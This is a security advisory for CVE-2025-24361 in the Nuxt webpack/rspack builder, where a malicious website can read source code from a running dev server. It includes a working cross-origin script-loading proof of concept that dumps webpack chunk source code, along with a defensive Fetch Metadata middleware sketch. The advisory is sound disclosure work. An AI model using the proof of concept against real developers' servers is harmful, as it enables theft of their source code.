CVE-2025-24361 @nuxt/rspack-builder

Package

Manager: npm
Name: @nuxt/rspack-builder
Vulnerable Version: >=3.12.2 <3.15.3

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.0007 (percentile: 0.21986)

Details

Opening a malicious website while running a Nuxt dev server could allow read-only access to code

### Summary

Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.

### Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `<script src="http://localhost:3000/_nuxt/app.js">` in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.

### PoC

1. Create a nuxt project with webpack / rspack builder.
2. Run `npm run dev`
3. Open `http://localhost:3000`
4. Run the script below in a web site that has a different origin.
5. You can see the source code output in the document and the devtools console.

```js
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)

    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)
```

![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)

It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).

### Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites.
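A defensive sketch for the cross-origin script load described above, added here and not taken from the advisory or from Nuxt's code: a connect-style middleware that refuses cross-site `no-cors` requests by inspecting the browser's Fetch Metadata headers. The names `shouldBlock`, `fetchMetadataGuard` and `evaluateSamples`, the `strict` option and the sample requests are assumptions constructed for illustration.

```javascript
// Added example; names are hypothetical, not a Nuxt API.
// Sec-Fetch-* headers are set by the browser. Page script cannot override
// them because "Sec-" prefixed names are forbidden request headers.
function shouldBlock(headers, { strict = false } = {}) {
  const site = headers['sec-fetch-site']
  const mode = headers['sec-fetch-mode']
  // Clients that send no Fetch Metadata (curl, older browsers) fall through.
  if (site === undefined || mode === undefined) return false
  // A classic <script src> without a crossorigin attribute is a no-cors request.
  if (mode !== 'no-cors') return false
  if (site === 'cross-site') return true
  // "same-site" ignores the port, so another app on localhost counts as
  // same-site; strict mode rejects that as well.
  return strict && site === 'same-site'
}

// Returns a (req, res, next) handler to mount in front of the dev server's
// static/bundle handler.
function fetchMetadataGuard(options) {
  return function guard(req, res, next) {
    if (shouldBlock(req.headers, options)) {
      res.statusCode = 403
      res.end('Blocked: cross-site no-cors request to dev server')
      return
    }
    next()
  }
}

// Constructed sample requests (not captured traffic).
const samples = [
  { name: 'script tag on another site',
    headers: { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors' } },
  { name: 'script tag on the app itself',
    headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'no-cors' } },
  { name: 'script tag on another localhost port',
    headers: { 'sec-fetch-site': 'same-site', 'sec-fetch-mode': 'no-cors' } },
  { name: 'typed into the address bar',
    headers: { 'sec-fetch-site': 'none', 'sec-fetch-mode': 'navigate' } },
  { name: 'client without Fetch Metadata', headers: {} },
]

// Maps each sample name to true (blocked) or false (served).
function evaluateSamples(options) {
  return Object.fromEntries(samples.map(s => [s.name, shouldBlock(s.headers, options)]))
}
```

Requests without Fetch Metadata headers pass through, so this check narrows the exposure in current browsers rather than replacing an upgrade out of the vulnerable version range.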

Metadata

Created: 2025-01-27T11:31:41Z
Modified: 2025-01-30T03:05:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-4gf7-ff8x-hq99/GHSA-4gf7-ff8x-hq99.json
CWE IDs: ["CWE-749"]
Alternative ID: GHSA-4gf7-ff8x-hq99
Finding: F164
Auto approve: 1